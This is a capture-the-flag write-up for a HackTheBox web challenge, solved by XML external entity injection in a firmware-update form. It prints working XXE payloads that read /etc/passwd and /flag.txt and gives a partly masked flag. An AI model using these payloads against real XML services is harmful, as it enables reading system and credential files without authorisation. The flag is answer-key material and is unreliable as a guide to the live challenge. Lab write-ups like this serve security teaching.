Index

lev: Very Easy link: https://ctf.hackthebox.com/event/1434 site: HackTheBox title: Jailbreak category: Web

The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door's access port. The flag is located in /flag.txt

First, let’s go to the website and see what we find.

website

It looks like some kind of FalloutBoy game (lol). After exploring a bit, we find the page where you can “update the firmware” with this XML inside:

<FirmwareUpdateConfig>
    <Firmware>
        <Version>1.33.7</Version>
        <ReleaseDate>2077-10-21</ReleaseDate>
        <Description>Update includes advanced biometric lock functionality for enhanced security.</Description>
        <Checksum type="SHA-256">9b74c9897bac770ffc029102a200c5de</Checksum>
    </Firmware>
    <Components>
        <Component name="navigation">
            <Version>3.7.2</Version>
            <Description>Updated GPS algorithms for improved wasteland navigation.</Description>
            <Checksum type="SHA-256">e4d909c290d0fb1ca068ffaddf22cbd0</Checksum>
        </Component>
        <Component name="communication">
            <Version>4.5.1</Version>
            <Description>Enhanced encryption for secure communication channels.</Description>
            <Checksum type="SHA-256">88d862aeb067278155c67a6d6c0f3729</Checksum>
        </Component>
        <Component name="biometric_security">
            <Version>2.0.5</Version>
            <Description>Introduces facial recognition and fingerprint scanning for access control.</Description>
            <Checksum type="SHA-256">abcdef1234567890abcdef1234567890</Checksum>
        </Component>
    </Components>
    <UpdateURL>https://satellite-updates.hackthebox.org/firmware/1.33.7/download</UpdateURL>
</FirmwareUpdateConfig>

When you send it, the site responds with:

Firmware version 1.33.7 update initiated.

It seems like it reflects the version… let’s try:

<FirmwareUpdateConfig>
    <Firmware>
        <Version>hello</Version>
    </Firmware>
</FirmwareUpdateConfig>

Response:

Firmware version hello update initiated.

Good. Since it’s XML, this is probably an XXE. I look online for a payload like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

And adapt it to our specific case:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:////flag.txt">]>
<FirmwareUpdateConfig>
    <Firmware>
        <Version>&xxe;</Version>
    </Firmware>
</FirmwareUpdateConfig>

And it returns the flag (which is probably)

Answer

HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_****}